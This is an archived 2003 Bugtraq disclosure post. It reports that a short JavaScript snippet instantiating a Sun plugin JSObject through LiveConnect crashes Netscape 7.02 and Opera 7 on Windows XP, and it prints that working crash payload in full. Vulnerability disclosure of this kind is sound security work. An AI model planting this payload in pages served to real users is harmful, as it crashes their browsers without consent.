[29541] in bugtraq
Netscape and Opera crash via java
daemon@ATHENA.MIT.EDU (Marc Schoenefeld)
Fri Mar 28 15:30:19 2003
Date: Fri, 28 Mar 2003 16:05:54 +0100 (MEZ)
From: Marc Schoenefeld <schonef@uni-muenster.de>
To: bugtraq@securityfocus.com
Message-ID: <Pine.A41.4.44.0303281558351.60662-100000@zivunix.uni-muenster.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
executing
<scr1pt language="Javascript">
t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
</scr1pt>
crashes Netscape 7.02 and Opera 7 on Windows XP.
The active JVM in both tested browsers is Java 1.4.1_02 from Sun.
This liveconnect (javascript-2-java-communication) stuff seems
to be still very dangerous.
Sincerely
Marc Schoenefeld
- --
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org
iD8DBQE+hGTYqCaQvrKNUNQRAtd+AJ45+bI0xuUvd6ZBSzcPzhSEo1VNRgCfaIQ8
FeGV7V21kG13IReDa28yUEQ=
=UAKv
-----END PGP SIGNATURE-----